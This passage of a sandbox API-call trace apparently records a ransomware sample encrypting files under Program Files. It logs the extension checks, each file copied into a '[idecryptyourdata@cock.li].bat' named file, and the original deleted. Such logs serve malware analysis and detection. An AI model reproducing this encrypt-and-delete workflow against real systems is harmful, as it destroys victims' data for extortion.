lpString2=".mui") returned -1 [0182.344] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0182.344] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0182.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.345] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=10752) returned 1 [0182.345] CloseHandle (hObject=0x364) returned 1 [0182.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui")) returned 0x20 [0182.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.345] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.345] lstrlenW (lpString=".doc") returned 4 [0182.345] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.345] lstrlenW (lpString=".docx") returned 5 [0182.345] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.345] lstrlenW (lpString=".pdf") returned 4 [0182.345] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.345] lstrlenW (lpString=".xls") returned 4 [0182.345] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.345] lstrlenW (lpString=".xlsx") returned 5 [0182.345] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.345] lstrlenW (lpString=".ppt") returned 4 [0182.345] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.346] lstrlenW (lpString=".zip") returned 4 [0182.346] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.346] lstrlenW (lpString=".rar") returned 4 [0182.346] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.346] lstrlenW (lpString=".bz2") returned 4 [0182.346] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.346] lstrlenW (lpString=".7z") returned 3 [0182.346] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.346] lstrlenW (lpString=".dbf") returned 4 [0182.346] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.346] lstrlenW (lpString=".1cd") returned 4 [0182.346] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.346] lstrlenW (lpString=".jpg") returned 4 [0182.346] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.346] lstrlenW (lpString=".doc") returned 4 [0182.346] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.346] lstrlenW (lpString=".docx") returned 5 [0182.346] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.346] lstrlenW (lpString=".pdf") returned 4 [0182.346] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.347] lstrlenW (lpString=".xls") returned 4 [0182.347] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.347] lstrlenW (lpString=".xlsx") returned 5 [0182.347] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.347] lstrlenW (lpString=".ppt") returned 4 [0182.347] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.347] lstrlenW (lpString=".zip") returned 4 [0182.347] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.347] lstrlenW (lpString=".rar") returned 4 [0182.347] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.347] lstrlenW (lpString=".bz2") returned 4 [0182.347] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.347] lstrlenW (lpString=".7z") returned 3 [0182.347] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.347] lstrlenW (lpString=".dbf") returned 4 [0182.347] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.347] lstrlenW (lpString=".1cd") returned 4 [0182.347] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0182.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0182.347] lstrlenW (lpString=".jpg") returned 4 [0182.347] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0182.347] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0182.348] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0182.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0182.348] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=9728) returned 1 [0182.348] CloseHandle (hObject=0x364) returned 1 [0182.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui")) returned 0x20 [0182.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 72 [0182.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 72 [0182.349] lstrlenW (lpString=".doc") returned 4 [0182.349] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0182.349] lstrlenW (lpString=".docx") returned 5 [0182.349] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0182.349] lstrlenW (lpString=".pdf") returned 4 [0182.349] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0182.349] lstrlenW (lpString=".xls") returned 4 [0182.349] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0182.349] lstrlenW (lpString=".xlsx") returned 5 [0182.349] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0182.349] lstrlenW (lpString=".ppt") returned 4 [0182.349] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0182.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 72 [0182.349] lstrlenW (lpString=".zip") returned 4 [0182.349] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0182.349] lstrlenW (lpString=".rar") returned 4 [0182.349] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0182.349] lstrlenW (lpString=".bz2") returned 4 [0182.349] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0182.349] lstrlenW (lpString=".7z") returned 3 [0182.349] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0182.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 72 [0182.350] lstrlenW (lpString=".dbf") returned 4 [0182.350] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0182.355] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0182.977] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0182.980] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0182.985] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.985] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0182.986] GetLastError () returned 0x0 [0182.986] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x58cd0, lpOverlapped=0x0) returned 1 [0183.019] WriteFile (in: hFile=0x388, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x58ce0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x58ce0, lpOverlapped=0x0) returned 1 [0183.027] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.027] WriteFile (in: hFile=0x388, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe8, lpOverlapped=0x0) returned 1 [0183.028] SetEndOfFile (hFile=0x388) returned 1 [0183.028] CloseHandle (hObject=0x388) returned 1 [0183.028] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.028] SetEndOfFile (hFile=0x374) returned 1 [0183.032] CloseHandle (hObject=0x374) returned 1 [0183.032] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0183.033] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe")) returned 1 [0183.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.034] lstrlenW (lpString=".doc") returned 4 [0183.034] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0183.034] lstrlenW (lpString=".docx") returned 5 [0183.034] lstrcmpiW (lpString1=".docx", lpString2="A.EXE") returned -1 [0183.034] lstrlenW (lpString=".pdf") returned 4 [0183.034] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0183.034] lstrlenW (lpString=".xls") returned 4 [0183.034] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0183.034] lstrlenW (lpString=".xlsx") returned 5 [0183.034] lstrcmpiW (lpString1=".xlsx", lpString2="A.EXE") returned -1 [0183.034] lstrlenW (lpString=".ppt") returned 4 [0183.034] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0183.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.034] lstrlenW (lpString=".zip") returned 4 [0183.034] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0183.034] lstrlenW (lpString=".rar") returned 4 [0183.034] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0183.034] lstrlenW (lpString=".bz2") returned 4 [0183.034] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0183.034] lstrlenW (lpString=".7z") returned 3 [0183.034] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0183.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.034] lstrlenW (lpString=".dbf") returned 4 [0183.034] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0183.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.034] lstrlenW (lpString=".1cd") returned 4 [0183.034] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0183.034] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.034] lstrlenW (lpString=".jpg") returned 4 [0183.034] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0183.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.035] lstrlenW (lpString=".doc") returned 4 [0183.035] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0183.035] lstrlenW (lpString=".docx") returned 5 [0183.035] lstrcmpiW (lpString1=".docx", lpString2="A.EXE") returned -1 [0183.035] lstrlenW (lpString=".pdf") returned 4 [0183.035] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0183.035] lstrlenW (lpString=".xls") returned 4 [0183.035] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0183.035] lstrlenW (lpString=".xlsx") returned 5 [0183.035] lstrcmpiW (lpString1=".xlsx", lpString2="A.EXE") returned -1 [0183.035] lstrlenW (lpString=".ppt") returned 4 [0183.035] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0183.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.035] lstrlenW (lpString=".zip") returned 4 [0183.035] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0183.035] lstrlenW (lpString=".rar") returned 4 [0183.035] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0183.035] lstrlenW (lpString=".bz2") returned 4 [0183.035] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0183.035] lstrlenW (lpString=".7z") returned 3 [0183.035] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0183.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.035] lstrlenW (lpString=".dbf") returned 4 [0183.035] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0183.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.035] lstrlenW (lpString=".1cd") returned 4 [0183.036] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0183.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 66 [0183.036] lstrlenW (lpString=".jpg") returned 4 [0183.036] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0183.036] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0183.036] lstrlenW (lpString="pkeyconfig.companion.dll") returned 24 [0183.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.038] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=18624) returned 1 [0183.038] CloseHandle (hObject=0x374) returned 1 [0183.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll")) returned 0x20 [0183.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0183.038] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.038] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0183.039] GetLastError () returned 0x0 [0183.039] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x48c0, lpOverlapped=0x0) returned 1 [0183.885] WriteFile (in: hFile=0x388, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x48d0, lpOverlapped=0x0) returned 1 [0183.886] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.886] WriteFile (in: hFile=0x388, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x104, lpOverlapped=0x0) returned 1 [0183.886] SetEndOfFile (hFile=0x388) returned 1 [0183.887] CloseHandle (hObject=0x388) returned 1 [0183.887] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.887] SetEndOfFile (hFile=0x374) returned 1 [0183.888] CloseHandle (hObject=0x374) returned 1 [0183.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0183.888] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll")) returned 1 [0183.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.889] lstrlenW (lpString=".doc") returned 4 [0183.889] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0183.889] lstrlenW (lpString=".docx") returned 5 [0183.889] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0183.889] lstrlenW (lpString=".pdf") returned 4 [0183.889] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0183.889] lstrlenW (lpString=".xls") returned 4 [0183.889] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0183.889] lstrlenW (lpString=".xlsx") returned 5 [0183.889] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0183.889] lstrlenW (lpString=".ppt") returned 4 [0183.889] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0183.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.889] lstrlenW (lpString=".zip") returned 4 [0183.889] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0183.889] lstrlenW (lpString=".rar") returned 4 [0183.889] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0183.889] lstrlenW (lpString=".bz2") returned 4 [0183.889] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0183.889] lstrlenW (lpString=".7z") returned 3 [0183.889] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0183.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.890] lstrlenW (lpString=".dbf") returned 4 [0183.890] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0183.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.890] lstrlenW (lpString=".1cd") returned 4 [0183.890] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0183.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.890] lstrlenW (lpString=".jpg") returned 4 [0183.890] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0183.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.890] lstrlenW (lpString=".doc") returned 4 [0183.890] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0183.890] lstrlenW (lpString=".docx") returned 5 [0183.890] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0183.890] lstrlenW (lpString=".pdf") returned 4 [0183.890] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0183.890] lstrlenW (lpString=".xls") returned 4 [0183.890] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0183.890] lstrlenW (lpString=".xlsx") returned 5 [0183.890] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0183.890] lstrlenW (lpString=".ppt") returned 4 [0183.890] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0183.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.890] lstrlenW (lpString=".zip") returned 4 [0183.890] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0183.890] lstrlenW (lpString=".rar") returned 4 [0183.890] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0183.890] lstrlenW (lpString=".bz2") returned 4 [0183.891] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0183.891] lstrlenW (lpString=".7z") returned 3 [0183.891] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0183.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.891] lstrlenW (lpString=".dbf") returned 4 [0183.891] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0183.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.891] lstrlenW (lpString=".1cd") returned 4 [0183.891] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0183.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 104 [0183.891] lstrlenW (lpString=".jpg") returned 4 [0183.891] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0183.891] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 